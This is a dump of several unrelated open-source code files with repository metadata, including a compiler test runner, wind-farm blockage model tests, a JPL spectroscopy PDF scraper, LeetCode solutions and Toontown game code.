51b37d4dba55ac1dce6921328221a67bb068261c
|
[] |
no_license
|
ZpRoc/checkio
|
fe4af88f116f75f8197cd31d857ae5262615b6af
|
126647f8971732bdf13d49092df178654dee889b
|
refs/heads/main
| 2023-03-22T23:52:37.330312
| 2021-03-10T02:28:56
| 2021-03-10T02:28:56
| 335,871,362
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 635
|
py
|
# ---------------------------------------------------------------- #
# Digit Stack
# Take the one off the top of the pile!
# (Numbers)
# ---------------------------------------------------------------- #
# ---------------------------------------------------------------- #
# ---------------------------------------------------------------- #
# ---------------------------------------------------------------- #
# ---------------------------------------------------------------- #
# ---------------------------------------------------------------- #
# ---------------------------------------------------------------- #
|
[
"zheng_roc@163.com"
] |
zheng_roc@163.com
|
5f477bed338ceb2d6e833ae8f6b79e32aa1680ee
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_sneers.py
|
a803280a36259a958b364c4e672bcfc2c97f2596
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
from xai.brain.wordbase.nouns._sneer import _SNEER
#calss header
class _SNEERS(_SNEER, ):
def __init__(self,):
_SNEER.__init__(self)
self.name = "SNEERS"
self.specie = 'nouns'
self.basic = "sneer"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
291ab02ed979348e94062f8dfa48aa3b87c29f40
|
af5c8d742226965ef73cf761782f0825fb374b7c
|
/string_format/parcela.py
|
21d6fe1122398071d26d21ef974fc71e743cdae5
|
[] |
no_license
|
Zahidsqldba07/PythonExamples-1
|
002e99d2581c05bfb8a1766caff12991f55e11bb
|
a9f5bbc58cc6941a73c537b3a22d812cc9081785
|
refs/heads/master
| 2023-03-16T08:40:43.781000
| 2019-01-11T04:33:03
| 2019-01-11T04:33:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 735
|
py
|
# coding: utf-8
# Passagem Aérea
# (c) Héricles Emanuel, UFCG, Programação 1
milhas = float(raw_input())
aliquota = float(raw_input())
valor_passagem = (milhas * aliquota) + 51.00
print "Valor da passagem: R$ %.2f" % valor_passagem
#Formas de Pagamento
# À vista
pag_vista = valor_passagem * 0.75
# Em 6 parcelas
pag_6 = valor_passagem * 0.95
# Em 10 parcelas
pag_10 = valor_passagem
# Valor das parcelas
# 6 Parcelas
parcela_6 = pag_6 / 6
# 10 Parcelas
parcela_10 = pag_10 / 10
print "\nPagamento:"
print "1. À vista. R$ %.2f" % pag_vista
print "2. Em 6 parcelas. Total: R$ %.2f" % pag_6
print " 6 x R$ %.2f" % parcela_6
print "3. Em 10 parcelas. Total: R$ %.2f" % pag_10
print " 10 x R$ %.2f" % parcela_10
|
[
"noreply@github.com"
] |
Zahidsqldba07.noreply@github.com
|
2facbb1ce7570c8227c25a19f561d45f47185148
|
8ef5a09d76a11c56963f18e6a08474a1a8bafe3c
|
/leet_code/1446. Consecutive Characters.py
|
9379134d01e057544f21fef8f3b8eec1ee75c106
|
[] |
no_license
|
roiei/algo
|
32c4677649c7666db148f6183fbfbf66c8b1969f
|
ae8bb8bf4ae4026ccaf1dce323b4098547dd35ec
|
refs/heads/master
| 2022-04-01T19:21:27.768675
| 2022-02-19T06:15:29
| 2022-02-19T06:15:29
| 169,021,154
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 633
|
py
|
import time
from util.util_list import *
from util.util_tree import *
import copy
import heapq
import bisect
import collections
class Solution:
def maxPower(self, s: str) -> int:
if not s:
return 0
cur = s[0]
mx = cnt = 1
for i in range(1, len(s)):
if s[i] == cur:
cnt += 1
mx = max(cnt, mx)
continue
cnt = 1
cur = s[i]
return mx
stime = time.time()
print(2 == Solution().maxPower(s = "leetcode"))
print('elapse time: {} sec'.format(time.time() - stime))
|
[
"hyoukjea.son@hyundai.com"
] |
hyoukjea.son@hyundai.com
|
2f1a3d7401b312b6b3dbbeef3cacb792e34eb756
|
206e54f4ad23386a08b634dbf1c5bc691ef76390
|
/build/scripts-3.6/4scanner
|
80627675ba7ac052fa3161208bd2848b3dfb8f4e
|
[
"MIT"
] |
permissive
|
Python3pkg/4scanner
|
f604cd0e265ec96f39116270c5dedb67f4d9b7d1
|
7e647081fd6a4fb7baff1a5fd11e2cdc3d22bd20
|
refs/heads/master
| 2021-01-21T09:14:32.962898
| 2017-05-18T19:38:38
| 2017-05-18T19:38:38
| 91,650,218
| 0
| 0
| null | 2017-05-18T04:56:17
| 2017-05-18T04:56:17
| null |
UTF-8
|
Python
| false
| false
| 1,866
|
#!/usr/local/opt/python3/bin/python3.6
import argparse
import os
import scanner
import time
def main():
# Arguments parsing and validation
parser = argparse.ArgumentParser()
parser.add_argument("keywords_file",
help="file with the keywords to search for")
parser.add_argument("-o", "--output", help="Specify output folder")
parser.add_argument("-w", "--wait-time",
help="Time to wait between each scan in minutes. "
"Default is 5 minutes")
parser.add_argument("-q", "--quota",
help="Exit when specified size quota "
"is exceeded. Ex: 500MB, 30GB etc...")
args = parser.parse_args()
# Checking keywords file
if not os.path.isfile(args.keywords_file):
print("Keywords file does not exist...")
exit(1)
if args.output:
output = args.output
if not os.path.exists(output):
print("{0} Does not exist.".format(output))
exit(1)
else:
output = os.getcwd()
# Checking for quota
if args.quota:
if "gb" in args.quota.lower():
quota_mb = args.quota.lower().split('g')[0] * 1000
elif "mb" in args.quota.lower():
quota_mb = args.quota.lower().split('m')[0]
else:
print("Quota format invalid. Valid example: 20GB, 700MB etc...")
exit(1)
else:
quota_mb = False
# Checking for sleep time
if args.wait_time:
wait_time = args.wait_time * 60
else:
wait_time = 300
log_file = "downloaded-{0}.txt".format(time.strftime('%d%m%Y_%H%M'))
scanner.scan(args.keywords_file, output, log_file, quota_mb, wait_time)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
|
[
"raliclo@gmail.com"
] |
raliclo@gmail.com
|
|
c20ef58d20f34d8cb7e2c6df7c4607975c74d86e
|
2dadf0fb64c52655704d9231b8039fc0343c5e88
|
/py_wake/tests/test_blockage_models/test_selfsimilarity.py
|
f7695f796c9dfe4810417efb6ead3f6cf6b334b5
|
[
"MIT"
] |
permissive
|
luqidndx/PyWake
|
45377245e8d35db3c7b33b27ef11b812db0a6ada
|
3d046eb14c4597de49ac2fee3771b8e0e68820ad
|
refs/heads/master
| 2022-07-02T01:40:28.575907
| 2020-05-13T16:51:42
| 2020-05-13T16:51:42
| 259,701,236
| 0
| 0
|
MIT
| 2020-04-28T17:06:59
| 2020-04-28T17:06:58
| null |
UTF-8
|
Python
| false
| false
| 5,796
|
py
|
import pytest
import matplotlib.pyplot as plt
import numpy as np
from py_wake.deficit_models import SelfSimilarityDeficit
from py_wake.deficit_models.no_wake import NoWakeDeficit
from py_wake.deficit_models.noj import NOJDeficit
from py_wake.examples.data import hornsrev1
from py_wake.examples.data.hornsrev1 import Hornsrev1Site
from py_wake.superposition_models import LinearSum
from py_wake.tests import npt
from py_wake.wind_farm_models.engineering_models import All2AllIterative
@pytest.fixture(scope='module')
def setup():
site = Hornsrev1Site()
windTurbines = hornsrev1.HornsrevV80()
ss = SelfSimilarityDeficit()
return site, windTurbines, ss
def test_selfsimilarity_reference_figures(setup):
ss = setup[2]
ws = 10
D = 80
R = D / 2
WS_ilk = np.array([[[ws]]])
D_src_il = np.array([[D]])
ct_ilk = np.array([[[.8]]])
x1, y1 = -np.arange(200), np.array([0])
deficit_centerline = ss.calc_deficit(WS_ilk=WS_ilk, D_src_il=D_src_il,
dw_ijlk=x1.reshape((1, len(x1), 1, 1)),
cw_ijlk=y1.reshape((1, len(y1), 1, 1)), ct_ilk=ct_ilk)[0, :, 0, 0]
x2, y2 = np.array([-2 * R]), np.arange(200)
deficit_radial = ss.calc_deficit(WS_ilk=WS_ilk, D_src_il=D_src_il,
dw_ijlk=x2.reshape((1, len(x2), 1, 1)),
cw_ijlk=y2.reshape((1, len(y2), 1, 1)), ct_ilk=ct_ilk)[0, :, 0, 0]
r12 = np.sqrt(ss.lambda_ * (ss.eta + (x2 / R) ** 2)) # Eq. (13) from [1]
if 0:
plt.title('Fig 11 from [1]')
plt.xlabel('x/R')
plt.ylabel('a')
plt.plot(x1 / R, deficit_centerline / ws)
print(list(np.round(deficit_centerline[::20], 6)))
plt.figure()
plt.title('Fig 10 from [1]')
print(list(np.round(deficit_radial[::20] / deficit_radial[0], 6)))
plt.xlabel('y/R12 (epsilon)')
plt.ylabel('f')
plt.plot((y2 / R) / r12, deficit_radial / deficit_radial[0])
plt.show()
fig11_ref = np.array([[-0.025, -1, -2, -3, -4, -5], [0.318, 0.096, 0.035, 0.017, 0.010, 0.0071]]).T
npt.assert_array_almost_equal(np.interp(-fig11_ref[:, 0], -x1 / R, deficit_centerline / ws), fig11_ref[:, 1], 1)
npt.assert_array_almost_equal(deficit_centerline[::20], [0, 1.806478, 0.95716, 0.548851, 0.345007,
0.233735, 0.1677, 0.125738, 0.097573, 0.077819])
fig10_ref = np.array([[0, 1, 2, 3], [1, .5, .15, .045]]).T
npt.assert_array_almost_equal(np.interp(fig10_ref[:, 0], (y2 / R) / r12, deficit_radial / deficit_radial[0]),
fig10_ref[:, 1], 1)
npt.assert_array_almost_equal(deficit_radial[::20] / deficit_radial[0],
[1.0, 0.933011, 0.772123, 0.589765, 0.430823, 0.307779,
0.217575, 0.153065, 0.107446, 0.075348])
def test_blockage_map(setup):
site, windTurbines, ss = setup
wm = All2AllIterative(site, windTurbines, wake_deficitModel=NoWakeDeficit(),
superpositionModel=LinearSum(), blockage_deficitModel=ss)
flow_map = wm(x=[0], y=[0], wd=[270], ws=[10]).flow_map()
X_j, Y_j = flow_map.XY
WS_eff = flow_map.WS_eff_xylk[:, :, 0, 0]
if 0:
plt.contourf(X_j, Y_j, WS_eff)
plt.plot(X_j[200, ::50], Y_j[200, ::50], '.-')
plt.plot(X_j[250, ::50], Y_j[250, ::50], '.-')
print(list(np.round(WS_eff[200, ::50], 6)))
print(list(np.round(WS_eff[250, ::50], 6)))
ss.windTurbines.plot([0], [0], wd=[270])
plt.show()
npt.assert_array_almost_equal(WS_eff[200, ::50], [9.940967, 9.911659, 9.855934,
9.736016, 9.44199, 10.0, 10.0, 10.0, 10.0, 10.0])
npt.assert_array_almost_equal(WS_eff[250, ::50], [9.937601, 9.90397, 9.834701,
9.659045, 9.049764, 10.0, 10.0, 10.0, 10.0, 10.0])
def test_wake_and_blockage(setup):
site, windTurbines, ss = setup
noj_ss = All2AllIterative(site, windTurbines, wake_deficitModel=NOJDeficit(),
blockage_deficitModel=ss, superpositionModel=LinearSum())
flow_map = noj_ss(x=[0], y=[0], wd=[270], ws=[10]).flow_map()
X_j, Y_j = flow_map.XY
WS_eff = flow_map.WS_eff_xylk[:, :, 0, 0]
npt.assert_array_almost_equal(WS_eff[200, ::50], [9.940967, 9.911659, 9.855934, 9.736016, 9.44199, 4.560631,
5.505472, 6.223921, 6.782925, 7.226399])
npt.assert_array_almost_equal(WS_eff[250, ::50], [9.937601, 9.90397, 9.834701, 9.659045, 9.049764, 4.560631,
5.505472, 6.223921, 6.782925, 7.226399])
if 0:
plt.contourf(X_j, Y_j, WS_eff)
plt.plot(X_j[200, ::50], Y_j[200, ::50], '.-')
plt.plot(X_j[250, ::50], Y_j[250, ::50], '.-')
print(list(np.round(WS_eff[200, ::50], 6)))
print(list(np.round(WS_eff[250, ::50], 6)))
ss.windTurbines.plot([0], [0], wd=[270])
plt.show()
def test_aep_two_turbines(setup):
site, windTurbines, ss = setup
nwm_ss = All2AllIterative(site, windTurbines, wake_deficitModel=NoWakeDeficit(),
blockage_deficitModel=ss, superpositionModel=LinearSum())
sim_res = nwm_ss(x=[0, 80 * 3], y=[0, 0])
aep_no_blockage = sim_res.aep_ilk(with_wake_loss=False).sum(2)
aep = sim_res.aep_ilk().sum(2)
# blockage reduce aep(wd=270) by .5%
npt.assert_almost_equal((aep_no_blockage[0, 270] - aep[0, 270]) / aep_no_blockage[0, 270] * 100, 0.4896853)
if 0:
plt.plot(sim_res.WS_eff_ilk[:, :, 7].T)
plt.show()
|
[
"mmpe@dtu.dk"
] |
mmpe@dtu.dk
|
fedd53070c0b4a1d64e61591d4c69662132cb765
|
7b55cfc4ffa7678e4c7b8f2312831ebbd549e54f
|
/proj1/tests/other-tests/oskis-angels_tests/regexperts_tests/test-proj1
|
afb5b61b6d7e62ec1bf967ca1639a3a68c36a002
|
[] |
no_license
|
czchen1/cs164-projects
|
0d330efef85421e611a436b165428ba0ddfb3512
|
a04cafbcaafd32e518227dacf89a6d7837bf9f57
|
refs/heads/master
| 2020-03-27T04:03:31.727524
| 2018-08-23T21:43:46
| 2018-08-23T21:43:46
| 145,909,148
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,436
|
#!/usr/bin/env python3
# Test compiler against suite of Python programs. Requires that pyunparse be
# on the path.
import os, sys, re
from subprocess import Popen, PIPE
from getopt import getopt, GetoptError
def Usage():
print('''
Usage: test-proj1 [ --errors ] [ --compiler=COMPILER ] [ --retain ] \
[ --runtime=RUNTIME.py ] DIR/BASE.py ...
Runs COMPILER (default ./apyc) on each DIR/BASE.py with the command
COMPILER --phase=1 -o BASE.ast PROGRAM-FILE
In the absence of the --errors option, unparses the result into
a Python program BASE-2.py. If there is a file BASE.pre, prefixes that
to BASE-2.py; otherwise, if there is a file RUNTIME.py specified,
prefixes that. Then runs python on BASE-2.py.
If there is a file DIR/BASE.in, uses that as the standard input.
Otherwise, uses the empty file for the standard input. Compares
the output to file DIR/BASE.std, if that is present, and otherwise
just checks that the python interpreter exits normally. Retains ASTs
if --retain.
With the --errors option, checks that the compiler exits with a
non-zero exit code and that stderr contains at least one error message
in the correct format. Does not unparse the resulting AST or execute
the Python interpreter.
Reports results and exits with 0 if there are no errors, and
with 1 otherwise.''', file=sys.stderr)
def Run(command, *args, **keys):
if args:
command = command % args
proc = Popen (command, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
out, err = proc.communicate(keys.get ('stdin', ''))
return proc.returncode, out.decode('utf-8'), err.decode('utf-8')
def Remove(file):
try:
os.unlink(file)
except OSError:
pass
def Contents(file):
try:
f = open(file)
r = f.read()
f.close()
return r
except:
return ""
def Compile(prog, ast):
global Stdout, Stderr
code, Stdout, Stderr = Run("%s --phase=1 -o %s %s", compiler, ast, prog)
return code == 0
def Unparse(ast, python, prefix=""):
code, out, err = Run("pyunparse --remove-extensions %s", ast)
if code != 0:
return False
outfile = open(python, "w")
outfile.write(prefix + out)
outfile.close()
return True
def Execute(prog, inp):
global Stdout, Stderr
code, Stdout, Stderr = Run("python %s", prog, stdin=inp.encode('utf-8'))
return code == 0
def HasError(errout):
return re.search (r'(?m)^[^:]+\.py:\d+:\s*\S', errout)
try:
opts, tests = getopt (sys.argv[1:], 'h',
['help', 'retain', 'errors', 'runtime=', 'compiler='])
except GetoptError:
Usage()
sys.exit(1)
compiler = './apyc'
errors = False
retain = False
runtime = ''
for opt, val in opts:
if opt in ( '-h', '--help' ):
Usage()
sys.exit(0)
elif opt == '--errors':
errors = True
elif opt == '--compiler':
compiler = val
elif opt == '--retain':
retain = True
elif opt == '--runtime':
runtime = Contents(val)
N = 0
OK = 0
for f in tests:
N += 1
dir, file = os.path.split(f)
base, ext = os.path.splitext(file)
print(base + ".py:", end=" ")
ast = base + ".ast"
if errors:
if Compile(f, ast):
msg = "FAIL (wrong exit code)"
elif HasError (Stderr):
msg = "OK"
else:
msg = "FAIL (bad error message)"
else:
prog2 = base + "-2.py"
inp = os.path.join(dir, base + ".in")
std = Contents (os.path.join(dir, base + ".std"))
prefix = Contents(os.path.join(dir, base + ".pre")) or runtime
if not Compile(f, ast):
msg = "FAIL (wrong exit code)"
elif Stderr:
msg = "FAIL (error messages)"
elif not Unparse(ast, prog2, prefix):
msg = "FAIL (bad AST)"
elif not Execute(prog2, Contents(inp)):
msg = "FAIL (execution error)"
elif Stderr:
msg = "FAIL (error output on execution)"
elif std and std != Stdout:
msg = "FAIL (wrong output)"
else:
msg = "OK"
Remove(prog2)
if not retain:
Remove(ast)
if msg == "OK":
OK += 1
print(msg)
print()
print("Ran %d tests." % N)
if OK == N:
print("All passed.")
sys.exit(0)
else:
print("%d failed." % (N - OK))
sys.exit(1)
|
[
"czchen@mit.edu"
] |
czchen@mit.edu
|
|
e7e0c38178d388d789d1caec87893f7825006c74
|
3d19e1a316de4d6d96471c64332fff7acfaf1308
|
/Users/L/lk_morgan/molecular_spectroscopy_data_3.py
|
e22a7abf2fdbca5d126d00da9a5629182b65adc7
|
[] |
no_license
|
BerilBBJ/scraperwiki-scraper-vault
|
4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc
|
65ea6a943cc348a9caf3782b900b36446f7e137d
|
refs/heads/master
| 2021-12-02T23:55:58.481210
| 2013-09-30T17:02:59
| 2013-09-30T17:02:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,992
|
py
|
###########################################################################################
# We use a ScraperWiki library called pdftoxml to scrape PDFs.
# This is an example of scraping a simple PDF.
###########################################################################################
import scraperwiki
import urllib2
import lxml.etree
import lxml.html
import re
htmlurl=scraperwiki.scrape("http://spec.jpl.nasa.gov/ftp/pub/catalog/catdir.html")
html = lxml.html.fromstring(htmlurl)
text_arr=[]
for el in html.cssselect("div[align='left'] a"):
text=el.text_content()
text_arr.append(text)
cat_list=[]
for k in text_arr:
if k != 'pdf' and k !='Tex': cat_list.append(k)
species_list=[]
for l in cat_list:
start = l.find('c')
end = l.find('.cat', start)
species_list.append(l[start+1:end])
for i in species_list:
#Skip the 055002 and 102002 files for now as they don't follow the regular format, need to fix this at some point
if i !='055002' and i !='102002':
print i
sp_url="http://spec.jpl.nasa.gov/ftp/pub/catalog/doc/d"+i+".pdf"
url = sp_url
pdfdata = urllib2.urlopen(url).read()
xmldata = scraperwiki.pdftoxml(pdfdata,'-hidden')
root = lxml.etree.fromstring(xmldata)
pages = list(root)
# this function has to work recursively because we might have "<b>Part1 <i>part 2</i></b>"
def gettext_with_bi_tags(el):
res = [ ]
if el.text:
res.append(el.text)
for lel in el:
res.append("<%s>" % lel.tag)
res.append(gettext_with_bi_tags(lel))
res.append("</%s>" % lel.tag)
if el.tail:
res.append(el.tail)
return "".join(res)
print gettext_with_bi_tags(pages[0])
row=[]
pagei=0
for page in list(pages):
pagei=pagei+1
eli=0
for el in list(page):
eli=eli+1
row.append(gettext_with_bi_tags(el))
try:
Species_Tagn=row.index('Species Tag:')
Species=row[Species_Tagn+1]
except:
Species='No Info'
try:
Namen = row.index('Name:')
if row[Namen+1] == row[Versionn-1]:Name=row[Namen+1]
else:Name=row[Namen+1]+row[Versionn-1]
except:
Name='No Info'
Versionn=row.index('Version:')
Daten=row.index('Date:')
Q300n=row.index('Q(300.0)=')
Q225n=row.index('Q(225.0)=')
Q150n=row.index('Q(150.0)=')
Q75n=row.index('Q(75.00)=')
Q37n=row.index('Q(37.50)=')
Q18n=row.index('Q(18.75)=')
Q9n=row.index('Q(9.375)=')
try:
mu_an=row.index('a')
except:
mu_an=row.index('0')
try:
mu_bn=row.index('b')
except:
mu_bn=row.index(u'\xb5 =')
try:
mu_cn=row.index('c')
except:
mu_cn=row.index('el')
maxJn=row.index('Max. J:')
An=row.index('A=')
Bn=row.index('B=')
Cn=row.index('C=')
State=row[Versionn+2:Daten]
statn=''
for j in State:
statn=statn+' '+j
if row[An+1] == u'\xb5' or row[An+1] == u'\xb5 =':A='no data'
else: A=row[An+1]
if row[Bn+1] == u'\xb5':B='no data'
else: B=row[Bn+1]
C_test=row[Cn+1]
if C_test != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':C='no data'
else:C=row[Cn+1]
if row[mu_an+2] != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':mua='no data'
else: mua=row[mu_an+2]
if row[mu_bn+2] != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':mub='no data'
else: mub=row[mu_cn+2]
if row[mu_cn+2] != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':muc='no data'
else: muc=row[mu_cn+2]
scraperwiki.sqlite.save(unique_keys=["Species Tag"],data={"Molecule":Name,"State":statn,"Species Tag":Species,"Max J":row[maxJn+1],"mu a":mua,"mu b":mub,"mu c":muc,"A":A,"B":B,"C":C,"Q300":row[Q300n+1],"Q225":row[Q225n+1],"Q150":row[Q150n+1],"Q75":row[Q75n+1],"Q37":row[Q37n+1],"Q18":row[Q18n+1],"Q9":row[Q9n+1]})
###########################################################################################
# We use a ScraperWiki library called pdftoxml to scrape PDFs.
# This is an example of scraping a simple PDF.
###########################################################################################
import scraperwiki
import urllib2
import lxml.etree
import lxml.html
import re
htmlurl=scraperwiki.scrape("http://spec.jpl.nasa.gov/ftp/pub/catalog/catdir.html")
html = lxml.html.fromstring(htmlurl)
text_arr=[]
for el in html.cssselect("div[align='left'] a"):
text=el.text_content()
text_arr.append(text)
cat_list=[]
for k in text_arr:
if k != 'pdf' and k !='Tex': cat_list.append(k)
species_list=[]
for l in cat_list:
start = l.find('c')
end = l.find('.cat', start)
species_list.append(l[start+1:end])
for i in species_list:
#Skip the 055002 and 102002 files for now as they don't follow the regular format, need to fix this at some point
if i !='055002' and i !='102002':
print i
sp_url="http://spec.jpl.nasa.gov/ftp/pub/catalog/doc/d"+i+".pdf"
url = sp_url
pdfdata = urllib2.urlopen(url).read()
xmldata = scraperwiki.pdftoxml(pdfdata,'-hidden')
root = lxml.etree.fromstring(xmldata)
pages = list(root)
# this function has to work recursively because we might have "<b>Part1 <i>part 2</i></b>"
def gettext_with_bi_tags(el):
res = [ ]
if el.text:
res.append(el.text)
for lel in el:
res.append("<%s>" % lel.tag)
res.append(gettext_with_bi_tags(lel))
res.append("</%s>" % lel.tag)
if el.tail:
res.append(el.tail)
return "".join(res)
print gettext_with_bi_tags(pages[0])
row=[]
pagei=0
for page in list(pages):
pagei=pagei+1
eli=0
for el in list(page):
eli=eli+1
row.append(gettext_with_bi_tags(el))
try:
Species_Tagn=row.index('Species Tag:')
Species=row[Species_Tagn+1]
except:
Species='No Info'
try:
Namen = row.index('Name:')
if row[Namen+1] == row[Versionn-1]:Name=row[Namen+1]
else:Name=row[Namen+1]+row[Versionn-1]
except:
Name='No Info'
Versionn=row.index('Version:')
Daten=row.index('Date:')
Q300n=row.index('Q(300.0)=')
Q225n=row.index('Q(225.0)=')
Q150n=row.index('Q(150.0)=')
Q75n=row.index('Q(75.00)=')
Q37n=row.index('Q(37.50)=')
Q18n=row.index('Q(18.75)=')
Q9n=row.index('Q(9.375)=')
try:
mu_an=row.index('a')
except:
mu_an=row.index('0')
try:
mu_bn=row.index('b')
except:
mu_bn=row.index(u'\xb5 =')
try:
mu_cn=row.index('c')
except:
mu_cn=row.index('el')
maxJn=row.index('Max. J:')
An=row.index('A=')
Bn=row.index('B=')
Cn=row.index('C=')
State=row[Versionn+2:Daten]
statn=''
for j in State:
statn=statn+' '+j
if row[An+1] == u'\xb5' or row[An+1] == u'\xb5 =':A='no data'
else: A=row[An+1]
if row[Bn+1] == u'\xb5':B='no data'
else: B=row[Bn+1]
C_test=row[Cn+1]
if C_test != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':C='no data'
else:C=row[Cn+1]
if row[mu_an+2] != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':mua='no data'
else: mua=row[mu_an+2]
if row[mu_bn+2] != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':mub='no data'
else: mub=row[mu_cn+2]
if row[mu_cn+2] != '0' or '1' or '2' or '3' or '4' or '5' or '6' or '7' or '8' or '9':muc='no data'
else: muc=row[mu_cn+2]
scraperwiki.sqlite.save(unique_keys=["Species Tag"],data={"Molecule":Name,"State":statn,"Species Tag":Species,"Max J":row[maxJn+1],"mu a":mua,"mu b":mub,"mu c":muc,"A":A,"B":B,"C":C,"Q300":row[Q300n+1],"Q225":row[Q225n+1],"Q150":row[Q150n+1],"Q75":row[Q75n+1],"Q37":row[Q37n+1],"Q18":row[Q18n+1],"Q9":row[Q9n+1]})
|
[
"pallih@kaninka.net"
] |
pallih@kaninka.net
|
061e7dda33dcb2c2fb0db6cad3aee933e290bf59
|
b1bc2e54f8cd35c9abb6fc4adb35b386c12fe6b4
|
/toontown/src/coghq/LobbyManager.py
|
a7cc7848ebf5356ae4059739f695cbf473e47cec
|
[] |
no_license
|
satire6/Anesidora
|
da3a44e2a49b85252b87b612b435fb4970469583
|
0e7bfc1fe29fd595df0b982e40f94c30befb1ec7
|
refs/heads/master
| 2022-12-16T20:05:13.167119
| 2020-09-11T16:58:04
| 2020-09-11T17:02:06
| 294,751,966
| 89
| 32
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 850
|
py
|
from pandac.PandaModules import *
from toontown.toonbase import ToontownGlobals
from direct.distributed import DistributedObject
from direct.directnotify import DirectNotifyGlobal
from toontown.toonbase import TTLocalizer
class LobbyManager(DistributedObject.DistributedObject):
notify = DirectNotifyGlobal.directNotify.newCategory("LobbyManager")
SetFactoryZoneMsg = "setFactoryZone"
def __init__(self, cr):
DistributedObject.DistributedObject.__init__(self, cr)
def generate(self):
self.notify.debug("generate")
DistributedObject.DistributedObject.generate(self)
def disable(self):
self.notify.debug("disable")
self.ignoreAll()
DistributedObject.DistributedObject.disable(self)
def getSuitDoorOrigin(self):
return 1
def getBossLevel(self):
return 0
|
[
"66761962+satire6@users.noreply.github.com"
] |
66761962+satire6@users.noreply.github.com
|
bf4dfb85175642bde5e44e837f015463e1b8fed7
|
036a41c913b3a4e7ae265e22a672dd89302d3200
|
/1201-1300/1237/1237_Python_1.py
|
7e07569009a051950622f77e1c5934eb19a13fe8
|
[] |
no_license
|
ChangxingJiang/LeetCode
|
e76f96ebda68d7ade53575354479cfc33ad4f627
|
a2209206cdd7229dd33e416f611e71a984a8dd9e
|
refs/heads/master
| 2023-04-13T15:23:35.174390
| 2021-04-24T05:54:14
| 2021-04-24T05:54:14
| 272,088,506
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,021
|
py
|
from typing import List
class CustomFunction:
def f(self, x, y):
return x + y
class Solution:
def findSolution(self, customfunction: 'CustomFunction', z: int) -> List[List[int]]:
idx1 = 1
idx2 = 1000
ans = []
while idx1 <= 1000 and idx2 >= 1:
if customfunction.f(idx1, idx2) < z:
mid = (idx1 + idx2) // 2
if customfunction.f(mid, idx2) < z:
idx1 = max(mid, idx1 + 1)
else:
idx1 += 1
elif customfunction.f(idx1, idx2) > z:
mid = (idx1 + idx2) // 2
if customfunction.f(idx1, mid) > z:
idx2 = min(mid, idx2 - 1)
else:
idx2 -= 1
else:
ans.append([idx1, idx2])
idx1 += 1
idx2 -= 1
return ans
if __name__ == "__main__":
print(Solution().findSolution(CustomFunction(), 5)) # [[1,4],[2,3],[3,2],[4,1]]
|
[
"1278729001@qq.com"
] |
1278729001@qq.com
|
b35153d84b3d5de30ced8c149b72bb65a1168607
|
1ba5c90292dbed982a23167fd083dd2cf29f6d8d
|
/bin/boliau-filter
|
5a2dda5ecd69ac3fffc88b2999546c11e061382c
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
hychen/boliau
|
8d99a331056ef18001cae5503084624c1e43618c
|
618e4557c7b4a3d97c9926b1d7e691291472ff7c
|
refs/heads/master
| 2021-01-01T17:37:25.012545
| 2013-08-16T09:58:58
| 2013-08-16T09:58:58
| 7,454,169
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,269
|
#!/usr/bin/env python
# -*- coding: utf-8 -*
#
# File: boliau-filter
#
# Copyright (C) 2012 Hsin-Yi Chen (hychen)
# Author(s): Hsin-Yi Chen (hychen) <ossug.hychen@gmail.com>
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from boliau import cmd
cmd.do_filter()
|
[
"ossug.hychen@gmail.com"
] |
ossug.hychen@gmail.com
|
|
338ab5824090a54458b92bcebc0868ff7bbea5b4
|
61eec9771de17885af1f817ddf7df8eaa1fdd168
|
/build/robmovil_msgs/catkin_generated/generate_cached_setup.py
|
116ed7667ac27a834209aaf5ce7318f3a3bf28e8
|
[] |
no_license
|
jrr1984/TP_FINAL_ROBOTICA
|
c1ce681b5ea4ca4fea7bfcde00fb289dc81842df
|
